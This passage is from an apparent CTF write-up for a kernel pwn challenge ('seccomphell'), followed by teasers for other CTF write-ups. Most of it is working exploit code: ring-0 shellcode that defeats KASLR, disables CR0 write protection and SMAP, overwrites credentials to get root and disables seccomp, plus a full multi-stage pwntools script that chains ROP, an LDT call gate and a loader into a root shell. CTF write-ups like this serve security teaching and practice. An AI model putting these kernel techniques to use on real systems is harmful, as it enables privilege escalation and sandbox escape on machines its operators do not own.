  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

TRAMPOLIN:
""") + trampolin)

Stage 5.1: call gate trampolin

the trampolin stays the same as in the one_byte writeup.

Stage 5.1:

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
PERCPU_CURRENT=0x1fbc0

ring0 = asm('int 3')
RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""
  cli

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

  RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)

Sandbox (Seccomp)

Finally let's try to write shellcode to disable seccomp.

Stage 5.2: ring 0 payload

For ring0 we will need to make some adjustions. The privilige escalation stays the same as in our PoC, but we will have to find some way to disable seccomp, even though we found this writeup about disabling seccomp it isn't helpfull anymore, because the x86 linux kernel changed the way seccomp works in newer version, but it gives us some important starting points: current (task_struct).

Lets first look at the task_struct, which simply includes a struct called seccomp:

include/uapi/linux/seccomp.h:

/* Valid values for seccomp.mode and prctl(PR_SET_SECCOMP, <mode>) */
#define SECCOMP_MODE_DISABLED   0 /* seccomp is not in use. */
#define SECCOMP_MODE_STRICT 1 /* uses hard-coded filter. */
#define SECCOMP_MODE_FILTER 2 /* uses user-supplied filter. */

Note: SECCOMP_MODE_DISABLED is not a valid mode to set using prctl Source Code

include/linux/sched.h:

struct seccomp {
    int mode;
    atomic_t filter_count;
    struct seccomp_filter *filter;
};

So can we just manually set the mode to SECCOMP_MODE_DISABLED ? ... no I also tried overwriting other parts in the seccomp struct, but none of this worked either. Ok let's go deeper down the rabbid hole and look at seccomp_filter

kernel/seccomp.c:

struct seccomp_filter {
    refcount_t refs;
    refcount_t users;
    bool log;
    bool wait_killable_recv;
    struct action_cache cache;
    struct seccomp_filter *prev;
    struct bpf_prog *prog;
    struct notification *notif;
    struct mutex notify_lock;
    wait_queue_head_t wqh;
}

No luck either, also manually patching the instructions bpf_prog didn't work.

Note: i didn't try messing with the flags to e.g. disable jited, so this might have worked

So what now? ... Well if we look ath the seccomp_filter struct we see a member called prev, interesting let's look at the source code for adding seccomp filters:

basically the seccomp_filters are a linked list, where as new filters replace the current root entry.

so let's first try to add a simple rules that allows everything.

#define ALLOW_PROCESS \
    BPF_STMT(BPF_RET+BPF_K, SECCOMP_RET_ALLOW)

void allow_all() {

    struct sock_filter seccomp_filter[] = {
        ALLOW_PROCESS,
    };

  struct sock_fprog prog = {
      .len = (unsigned short)(sizeof(seccomp_filter) / sizeof(struct sock_filter)),
      .filter = (struct sock_filter*)&seccomp_filter,
  };

  assert(prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0) != -1);
  assert(prctl(PR_SET_SECCOMP, SECCOMP_MODE_FILTER, &prog) != -1);
}

which basically creates a struct that looks like this:

00:0000│ rdx rsp 0x7fffffffe750 ◂— 1
01:0008│-018     0x7fffffffe758 —▸ 0x7fffffffe760 ◂— 0x7fff000000000006
02:0010│-010     0x7fffffffe760 ◂— 0x7fff000000000006

and add it by calling do_seccomp directly.

Well this added our rules to the top of our linked list and incremented the filter_count, but we still can't call new syscalls. This is because SECCOMP_RET_KILL_PROCESS takes precidents over SECCOMP_RET_ALLOW according to man pages.

But what we can do now is manually reduce the seccomp.filter_count to 1 and remove our previous seccomp_filter seccomp->filter_count.prev = NULL and we successfully disabled seccomp.

Stage 5.2:

PAYLOAD = 0x401000

# fake seccomp filter RETURN ALLOW
seccomp = flat(
 1, # size
 PAYLOAD+0x18, # args (ptr to rules)
 0x7fff000000000006, # rules (RETURN ALLOW)
)


PTI_SWITCH_MASK=0x1000

KASLR_WRITE_TO=0xbad000

# ffffffff810fc820 T commit_creds
COMMIT_CRED = 0xfc820

# ffffffff810fccd0 T prepare_creds
PREP_CRED = 0xfccd0

# https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L2046
# ffffffff81200cd0 t do_seccomp
DO_SECCOMP = 0x200cd0

SECCOMP_SET_MODE_FILTER=1

# current struct offset from gs
CURRENT=0x34940

# seccomp_filter: https://elixir.bootlin.com/linux/v6.9.3/source/kernel/seccomp.c#L22

ring0 = asm(f"""
  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // and rdi, {~0xffffff}
  sub rdi, {KASLR_WRITE_TO +0x400000}
  and rdi, {~0xfffff}
  mov r15, rdi

  // add fake seccomp filter, allow all
  lea rax, [r15+{DO_SECCOMP}]
  mov rdi, {SECCOMP_SET_MODE_FILTER}
  xor rsi, rsi
  mov rdx, {PAYLOAD+0x8}
  call rax

  // privilige escalation
  // crpt_cred = prepare_cred();

  lea rax, [r15+{PREP_CRED}]
  call rax

  // crpt_cred.uid = 0;
  // crpt_cred.gid = 0;
  mov rdi, rax
  movq [rdi+8], 0

  // commit_creds(crpt_cred);
  lea rax, [r15+{COMMIT_CRED}]
  call rax

  // DISABLE SECCOMP

  // get current
  movq rax, qword ptr gs:[{CURRENT}]

  // current.seccomp.count = 1 (was 2, fake and init)
  mov dword ptr[rax+0xc6c], 1

  // get current.seccomp.seccomp_filter
  mov rax, qword ptr[rax+0xc70]
  // get current.seccomp.seccomp_filter->prev = NULL
  mov qword ptr[rax+0x90], 0

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8
  iretq

""")

Final stage: get flag

At this point everthing should be straightforward, but sadly this version worked, but had a pretty bad successrate. This is because of the calls probably reenable interrupts, as mentioned in one_byte writeup. But this exploit was good enough to get the flag.

/root/flag.txt

NOPE <3
Please get a full root shell
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣤⣶⣶⣆⡐⠠⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⢿⠿⠿⠿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣸⣮⢰⣄⣸⡇⠄⠀⠠⠀⠀⠀⠀⢀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⣧⡗⡽⠤⠉⣹⠇⠀⠁⡄⠀⠀⡀⠀⠀⠁⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠄⠀⠀⠀⢴⣫⣝⣉⣽⡁⠀⠀⠀⠇⠀⠈⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⠁⣲⡵⢻⣧⡎⡰⢋⣷⣤⣔⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠐⠄⠀⢀⣠⣶⣿⣿⣅⣺⣿⡋⢀⣾⣿⣿⣿⣿⣿⣿⣆⠀⠃⢀⠎⠀⠀⠀
⠀⠀⠀⠀⠀⠐⠀⠈⠂⠀⣿⣿⣿⣿⣿⣿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠈⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⢃⠀⠃⢈⣿⣿⣿⣿⣿⣏⢸⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣋⠝⣿⣿⣿⣿⣿⣿⣷⣄⠃⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣭⣽⣘⣿⣿⣿⣿⣿⣿⣿⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⡠⠀⢸⣿⣿⣭⡿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢿⣿⣿⠿⠟⠀⡀⠀
⠀⠀⢈⠒⡀⠀⠀⠀⠀⠈⢛⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⠀⠀⠀⠀⢀⠐⡀⠀
⣀⢠⠊⢀⠰⠀⠀⠀⠠⢀⠀⢐⡈⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡄⠠⠈⡐⠂⠐⡄⢀

Actually this wasn't the flag, we need to actually use our root shell to find the flag.

using find / -name '*flag*' 2> /dev/null we find a flag generator /root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag, that we can execute the get the flag.

while (out := rl().rstrip()) != b'[+] spawning shell' :
  linfo(out.decode())

linfo(out.decode())

linfo("FINAL STAGE")

sl('echo PWND')
# sla('PWND', 'find / -name '*flag*' 2> /dev/null')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')

it() # or t.interactive()

improving success rate

After the CTF concluded I talked with others that solved the challenge and realized why my successrate was so bad, it was the calls. So inspired by other peoples solution I rewrote my shellcode to have a way better successrate.

For privilige escalation we manually edit the cred struct, that is linked in current to become root (normally there are credand real_cred), but in this scenario they are the same so we simply edit the uid and gid of one to become root .

Disabling seccomp is more interesting, basically in thread_info there is an attribute called syscall_work that set's flags for e.g. enabling seccomp. So what we need to do is to unset the flag and we can now execute all syscalls. But this only works for the current work_struct, if we execve another binary seccomp get's reset.

So additionally we need to set the seccomp->mode to SECCOMP_MODE_DISABLED

Stage 5.2 (improved):

PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  /* PRIVILIGE ESCALATION */

  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  /* DISABLE SECCOMP */

  // current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}


  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8
  iretq

""")

Exploit

Flag: hitcon{if_kernel_goes_brrrr_seccomp_filter_becomes_this:https://www.youtube.com/watch?v=nTT2fNyKgUE}

exploit.py:

#!/usr/bin/env python3
from pwn import *

GDB_OFF = 0x555555554000
IP = 'seccomphell.chal.hitconctf.com' if args.REMOTE else 'localhost' 
PORT =  int(sys.argv[1]) if len(sys.argv) >= 2 else 22222

BINARY = './bins/i_am_not_backdoor.bin'
ARGS = []
ENV = {
  'SHLVL':'2', 
  'HOME':'/', 
  'TERM':'linux',
  'PWD':'/',
  'SOCAT_PID':'190',
  'SOCAT_PPID':'189',
  'SOCAT_VERSION':'1.7.3.0',
  'SOCAT_SOCKADDR':'10.0.2.15',
  'SOCAT_SOCKPORT':'22222',
  'SOCAT_PEERADDR':'10.0.2.2',
  'SOCAT_PEERPORT':'54394'
} # os.environ
GDB = f"""
set follow-fork-mode parent

# backdoor
# b * 0x4018dc

# rop start
# b * 0x401d05

# loader
hb * 0x400000

# payload
hb * 0x401000

c"""

context.binary = exe = ELF(BINARY, checksec=False)
# libc = ELF('', checksec=False)
context.aslr = True

cst = constants
shc = shellcraft

linfo = lambda x, *a: log.info(x, *a)
lwarn = lambda x, *a: log.warn(x, *a)
lerror = lambda x, *a: log.error(x, *a)
lprog = lambda x, *a: log.progress(x, *a)

byt = lambda x: x if isinstance(x, bytes) else x.encode() if isinstance(x, str) else repr(x).encode()
phex = lambda x, y='': print(y + hex(x))
lhex = lambda x, y='': linfo(y + hex(x))
pad = lambda x, s=8, v=b'\0', o='r': byt(x).ljust(s, byt(v)) if o == 'r' else byt(x).rjust(s, byt(v))
padhex = lambda x, s=None: pad(hex(x)[2:],((x.bit_length()//8)+1)*2 if s is None else s, b'0', 'l')
upad = lambda x: u64(pad(x))
tob = lambda x: bytes.fromhex(padhex(x).decode())

gelf = lambda elf=None: elf if elf else exe
srh = lambda x, elf=None: gelf(elf).search(byt(x)).__next__()
sasm = lambda x, elf=None: gelf(elf).search(asm(x), executable=True).__next__()
lsrh = lambda x: srh(x, libc)
lasm = lambda x: sasm(x, libc)

cyc = lambda x: cyclic(x)
cfd = lambda x: cyclic_find(x)
cto = lambda x: cyc(cfd(x))

t = None
gt = lambda at=None: at if at else t
sl = lambda x, t=None, *a, **kw: gt(t).sendline(byt(x), *a, **kw)
se = lambda x, t=None, *a, **kw: gt(t).send(byt(x), *a, **kw)
ss = lambda x, s, t=None, *a, **kw: sl(x, t, *a, **kw) if len(y) < s else se(x, *a, **kw)
sla = lambda x, y, t=None, *a, **kw: gt(t).sendlineafter(byt(x), byt(y), *a, **kw)
sa = lambda x, y, t=None, *a, **kw: gt(t).sendafter(byt(x), byt(y), *a, **kw)
sas = lambda x, y, s, t=None, *a, **kw: sla(x, y, t, *a, **kw) if len(y) < s else sa(x, y, *a, **kw)
ra = lambda t=None, *a, **kw: gt(t).recvall(*a, **kw)
rl = lambda t=None, *a, **kw: gt(t).recvline(*a, **kw)
rls = lambda t=None, *a, **kw: rl(t=t, *a, **kw)[:-1]
re = lambda x, t=None, *a, **kw: gt(t).recv(x, *a, **kw)
ru = lambda x, t=None, *a, **kw: gt(t).recvuntil(byt(x), *a, **kw)
it = lambda t=None, *a, **kw: gt(t).interactive(*a, **kw)
cl = lambda t=None, *a, **kw: gt(t).close(*a, **kw)


vm = None
def get_target(**kw):
  global vm

  if args.REMOTE or args.TEST:
    # context.log_level = 'debug'
    return remote(IP, PORT)

  if args.LOCAL:
    if args.GDB:
      return gdb.debug([BINARY] + ARGS, env=ENV, gdbscript=GDB, **kw)
    return process([BINARY] + ARGS, env=ENV, **kw)

  try:
    from vagd import Dogd, Qegd, Box # only load vagd if needed
  except:
    log.error("Failed to import vagd, either run locally using LOCAL or install it")
  if not vm:
    vm = Dogd(BINARY, image=Box.DOCKER_JAMMY, ex=True, fast=True)  # Docker
    # vm = Qegd(BINARY, img=Box.QEMU_JAMMY, ex=True, fast=True)  # Qemu
  if vm.is_new:
    log.info("new vagd instance") # additional setup here
  return vm.start(argv=ARGS, env=ENV, gdbscript=GDB, **kw)


t = get_target()

#############################################
# STAGE 1: ROP BACKDOOR                     #
#############################################

linfo("STAGE 1: ROP")

std = b'/dev/pts/0\0'

uname = std

passwd = b'' 

sas('220 (vsFTPd 2.3.4)', uname, 0x80)
sas('331 Please specify the password.', passwd, 0x80)

sret_gen = exe.search(asm('syscall ; ret'), executable=True)
next(sret_gen)
next(sret_gen)
SYSCALL_RET = next(sret_gen)

PIVOT = 0x4a7b00

rop = ROP(exe)
rop.raw(PIVOT+0x100) # rbp
rop.call(sasm('mov rax, rbx ; pop rbx ; ret'))
rop.raw(0x6fe1be2)
rop.rdi = 0x258 
rop.call(sasm('sub rax, rdi ; ret'))
rop.call(sasm('mov rdi, rax ; ret'))
rop.rax = cst.SYS_open 
rop.rsi = cst.O_RDWR
rop.call(SYSCALL_RET)

rop.rsi = PIVOT
# rop.rdx = 0x400
rop.call(0x0000000000428de0)

rop.call(sasm('mov rdi, rax ; ret'))
rop.call(SYSCALL_RET)
rop.call(sasm('leave ; ret'))

linfo("loader len: 0x%x", len(bytes(rop)))
assert len(bytes(rop)) <= 0x98

# input()
sas('530 Login incorrect.', bytes(rop), 0x98)


#############################################
# STAGE 2: PIVOT ROP                        #
#############################################


linfo("STAGE 2: PIVOT")

LOADER = 0x400000

pivot = ROP(exe)
pivot.raw(0x6fe1be2) # rbp

pivot.rax = cst.SYS_open
pivot.rdi = PIVOT
pivot.rsi = cst.O_RDWR
pivot.rdx = 0
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_mprotect + 1
pivot.call(sasm('sub rax, 1 ; ret'))
pivot.rdi = LOADER
pivot.rsi = 0x5000
pivot.rdx = cst.PROT_READ | cst.PROT_WRITE | cst.PROT_EXEC
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_write
pivot.rdi = cst.STDOUT_FILENO
pivot.rsi = PIVOT+0x10
pivot.rdx = 8
pivot.call(SYSCALL_RET)

pivot.rax = cst.SYS_read
pivot.rdi = cst.STDIN_FILENO
pivot.rsi = LOADER 
pivot.rdx = 0x1000
pivot.call(SYSCALL_RET)

pivot.call(LOADER)

pivot.exit(0)

chain = flat({
  0: std,
  0x10: b'STAGE 2',
  0x18: b'STAGE 3',
  0x20: b'FAIL',
  0x100: pivot
})

linfo("pivot len: 0x%x", len(chain))
sleep(1)

sl(chain)

#############################################
# STAGE 5.2: RING 0 PAYLOAD                 #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/


PTI_SWITCH_MASK=0x1000

# current (task_struct) offset from gs
# task_struct: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/sched.h#L748
CURRENT=0x34940

# cred: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/cred.h#L111 
CRED_OFF=0xb80
UID_OFF=8

# seccomp: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/seccomp_types.h#L22
SECCOMP_OFF=0xc68
# seccomp->mode: https://elixir.bootlin.com/linux/v6.9.3/source/include/uapi/linux/seccomp.h#L10
SECCOMP_MODE_DISABLED = 0

# thread_info: https://elixir.bootlin.com/linux/v6.9.3/source/arch/x86/include/asm/thread_info.h#L64
SYSCALL_WORK_OFF=0x8
# syscall_work: https://elixir.bootlin.com/linux/v6.9.3/source/include/linux/thread_info.h#L51
SYSCALL_WORK_SECCOMP=1

ring0 = asm(f"""

  /* PROLOGUE */

  // Get access to per-cpu variables (current, mostly) via swapgs
  swapgs

  // Get the current page table.
  movq rbx, cr3

  // Switch to the kernel page table.
  andq rbx, {~PTI_SWITCH_MASK}
  movq cr3, rbx

  // get current
  movq r15, qword ptr gs:[{CURRENT}]


  /* PRIVILIGE ESCALATION */

  // current->cred.uid = 0
  mov rax, qword ptr[r15+{CRED_OFF}]
  mov dword ptr[rax+{UID_OFF}], 0 


  /* DISABLE SECCOMP */

  // current.thread_info.seccomp_off &= ~SYSCALL_WORK_SECCOMP
  and qword ptr[r15+{SYSCALL_WORK_OFF}], {~SYSCALL_WORK_SECCOMP}

  // current.seccomp.mode = SECCOMP_MODE_DISABLED   
  mov dword ptr[r15+{SECCOMP_OFF}], {SECCOMP_MODE_DISABLED}


  /* EPILOG */

  // Swap back
  swapgs

  // Switch the page table back around
  orq rbx, {PTI_SWITCH_MASK}
  movq cr3, rbx

  // Build an `iret` stackframe rather than a `ret far` stack frame.
  // => %rip
  popq r8 
  // => %cs
  popq r9

  pushfq
  // Set IF in the new RFLAGS (like sti)
  orq rsp, {1 << 9}
  pushq r9
  pushq r8
  iretq

""")


#############################################
# STAGE 5.1: CALL GATE TRAMPOLIN            #
#############################################

# https://hxp.io/blog/99/hxp-CTF-2022-one_byte-writeup/

TRAMPOLIN = 0xc00000

MSR_LSTAR=0xc0000082
KASLR_WRITABLE=0xa00000
KASLR_LSTAR=0xa00010
KASRL_WRITABLE_END=0xc00000
KASLR_INIT_TASK=0x1613940
KASLR_WRITE_TO=0xbad000
PERCPU_CURRENT=0x1fbc0

RING0_LEN = len(ring0)

# write ring0 payload to kernel space and execute 
trampolin = asm(f"""
  cli

  // Read LSTAR to bypass KASLR
  mov ecx, {MSR_LSTAR}
  rdmsr
  shl rdx, 32
  or rdx, rax
  subq rdx, {KASLR_LSTAR}
  movq rbp, rdx

  // Disable WP
  movq r8, cr0
  andq r8, {(~(1 << 16))}
  movq cr0, r8

  // Copy stage 5.2 to the mapped kernel entry point
  movq rdi, rbp
  addq rdi, {KASLR_WRITE_TO}
  movq r15, rdi
  lea rsi, [rip+RING_0]
  mov ecx, {RING0_LEN}
  rep movsb

  // Jump there.
  jmp r15

  RING_0:
""") + ring0

TRAMPOLIN_LEN = len(trampolin)

#############################################
# STAGE 4: KERNEL BACKDOOR, LDT CALL GATE   #
#############################################

far_func = p64(0x67dead8664)

payload = bytearray(far_func+asm(f"""
  {shc.echo("STAGE 4")}

  {shc.echo("[+] INIT\n")}

  {shc.pushstr("/dev/i_am_definitely_not_backdoor")}
  {shc.syscall(cst.SYS_open, 'rsp', cst.O_RDWR, 0)}
  cmp rax, 0
  jl FAIL

  mov rbx, rax
  {shc.echo("[+] backdoor fd: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}

  {shc.echo("\n[+] START\n")}

  // disable SMAP
  {shc.echo("[+] 'stac' in CPL3\n")}
  pushfq
  or         QWORD PTR [rsp],0x40000
  popfq

  {shc.echo("[+] modify_ldt user\n")}
  mov        rax, 0x100001000
  push       rax
  mov        rax, 0x100000000c
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] modify_ldt high\n")}

  mov        rax, 0x380000FFFF
  push       rax
  mov        rax, 0xFFFF0000000E
  push       rax
  mov        rsi, rsp

  {shc.syscall(cst.SYS_modify_ldt, 0x11, 'rsi', 0x10)}

  {shc.echo("[+] write to backdoor\n")}
  {shc.pushstr('TEST')}
  mov rsi, rsp
  {shc.syscall(cst.SYS_write, 'rbx', 'rsi', 0)}
  cmp rax, 0
  jl FAIL

  {shc.echo("[+] cpy trampolin\n")}
  {shc.mmap_rwx(size=0x10000, address=TRAMPOLIN)}
  lea rsi, [rip+TRAMPOLIN]
  {shc.memcpy(TRAMPOLIN, 'rsi', TRAMPOLIN_LEN)}

  // call CALL GATE for privilige escalation
  {shc.echo("[+] go to CPL 0\n")}
  call   FWORD PTR ds:{PIVOT-0xa6b00}

  // should be root
  {shc.echo("[+] spawning shell\n")}
  {shc.sh()}
  jmp FAIL


FAIL:
  mov rbx, rax
  neg rbx
  {shc.echo("[-] errno: ")}
  {shc.itoa('rbx')}
  {shc.strlen('rsp')}
  {shc.syscall(cst.SYS_write, cst.STDOUT_FILENO, 'rsp', 'rcx')}
  {shc.echo("\n[-] FAIL\n")}
  int 3

TRAMPOLIN:
""") + trampolin).ljust(0x500, asm('nop'))


#############################################
# STAGE 3: LOAD ENCODED PAYLOAD             #
#############################################

PAYLOAD = 0x401000
PAYLOAD_LEN = len(payload)

loader = bytearray(asm(f"""
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x18, 7)}
  xor rbx, rbx
LOAD:
  // get two characters (one byte)
  push 0
  {shc.syscall(cst.SYS_read, cst.STDIN_FILENO, 'rsp', 2)}
  cmp rax, 2
  jl FAIL
  pop rax
  sub ah, 0x41 
  sub al, 0x41 
  shl al, 2
  shl al, 2
  shr rax, 2
  shr rax, 2
  mov BYTE PTR [rbx+{PAYLOAD}], al
  inc rbx
  cmp rbx, {PAYLOAD_LEN}
  jb LOAD

  // jmp to next stage
  mov rax, {PAYLOAD+0x8}
  jmp rax

FAIL:
  {shc.write(cst.STDOUT_FILENO, PIVOT+0x20, 5)}
  int 3
"""))

assert all(bad not in loader for bad in b"\x04\n"), "can't have certain escape chars"

# send all the code

linfo("STAGE 3: LOADER")

# linfo(disasm(loader))
sla("STAGE 2", bytes(loader))

# custom encoding:
#  hex starting a 'A'
#  and least significant nibble first

payload_enc = b''
for b in payload:
  lo = (b & 0xf) + 0x41
  hi = ((b & 0xf0) >> 4) + 0x41
  payload_enc += bytes((lo, hi))


linfo("STAGE 4: PAYLOAD")

sla('STAGE 3', payload_enc)

# linfo(disasm(payload))
linfo("payload len: 0x%x", len(payload))

ru("STAGE 4")

context.newline = b'\r\n'

while (out := rl().rstrip()) != b'[+] spawning shell' :
  linfo(out.decode())

linfo(out.decode())

#############################################
# FINAL STAGE: GET FLAG                     #
#############################################

linfo("FINAL STAGE")

sl('echo PWND')
sla('PWND', '/root/.flag_is_not_here/.flag_is_definitely_not_here/.genflag')


it() # or t.interactive()

FAUST CTF 2023 - image-galoisry

Thu 05 October 2023 • Hetti, jalaka • writeup

AES Oracle meets OCR

Introduction The service image-galoisry is a flask web server accompanied by a web GUI. On the website, users can create new image galleries, which are safeguarded by a password. Following gallery creation, users have the option to upload images, with each image undergoing encryption with AES. Notably, these galleries, while publicly accessible, only display encrypted files for download. However, should a user possess the password for a specific gallery, they have the option to instruct the...

Google CTF 2023 - oldschool

Tue 18 July 2023 • cluosh, gmerz • writeup

Write an oldschool keygen for an oldschool login interface.

Google CTF 2022 presented us with oldschool, a typical, as the name suggests, oldschool crackme with an ncurses terminal interface. The goal of the challenge was to write a keygen, which would be able to generate keys for a list of users provided by the CTF organizers. The official and detailed writeup is available here, which goes through the intended solution of manually reverse engineering the key verification algorithm. However, since we are researchers (and most importantly, too lazy to manually...

DiceCTF 2023 - chess.rs

Sun 05 February 2023 • 0x6fe1be2, cluosh, fkehrer, lavish • writeup

🚀 blazingfast rust wasm chess 🚀

TL;DR chess.rs is a pwn(/web) challenge using Rust with WebAssembly. The goal is to extract the cookies of the admin browser bot. We have a rust webserver providing two pages index.html (graphical frontend) and engine.html ("backend", runs the wasm logic). index.html loads engine.html as an iframe. They send messages through .postMessage and receive them through the window.onmessage event listener. There is a hidden parameter in the init function on engine.html that allows setting a custom board position...

CInsects CTF 2022 - catclub

Mon 14 March 2022 • jalaka • writeup

Trick Captcha to believe a dog is actually a cat and let it into the catclub

The challenge catclub is written in Python and offers the service shadymail that can be accessed after an image captcha is solved and the hidden catclub page where various pictures of random cats can be seen. Service Overview The home page which consists of a captcha where all images of an specific animal must be selected to proceed.(/) The shadymail service which can be accessed after completing a captcha (/shadymail/home) The catclub page where random cat images from the...

DCTF 2021 - Just In Time

Mon 17 May 2021 • lehrbaum • writeup

Using frida to get decrypted flag.

Description Don't fall in (rabbit) holes Preface We get a binary which just prints Decryption finished. Overview Using ghidra, we can analyse the binary. Inside the main of the binary we can see, that their is some binary content and multiple functions called with strncpy in between. undefined8 main(int argc,char **argv) { char *key_text; char Read More

DCTF 2021 - Pinch me

Mon 17 May 2021 • lehrbaum • writeup

Buffer overflow to overwrite variable

Description This should be easy! nc dctf1-chall-pinch-me.westeurope.azurecontainer.io 7480 Preface We got a binary file which asked us Am I dreaming? and with basic input prints then Pinch me! Overview Loading the binary into ghidra we can see, that the interaction happens in the function vuln void vuln(void) { char local_28 [24]; int local_10; int local_c Read More

DCTF 2021 - Baby bof

Mon 17 May 2021 • lehrbaum • writeup

Buffer overflow and ret2libc

Description It's just another bof. nc dctf-chall-baby-bof.westeurope.azurecontainer.io 7481 Preface We got a simple binary with output plz don't rop me and after our input plz don't rop me Also we got a Dockerfile, which showed us the used image was Ubuntu:20.04 Overview Based on the output, we know it was a rop challenge. Also checksec baby_bof gave us. Arch: amd64-64-little RELRO: Partial RELRO Read More

DCTF 2021 - Pwn sanity check

Mon 17 May 2021 • lehrbaum • writeup

Simple buffer overflow with ret2win.

Description This should take about 1337 seconds to solve. nc dctf-chall-pwn-sanity-check.westeurope.azurecontainer.io 7480 Preface We get a simple binary, with simple input and output. Overview Looking at the binary in ghidra, I found these functions. void vuln(void) { char local_48 [60]; int local_c; puts("tell me a joke"); fgets(local_48,0x100 Read More

DCTF 2021 - Readme

Mon 17 May 2021 • lehrbaum • writeup

Format String to dump the memory and get flag.

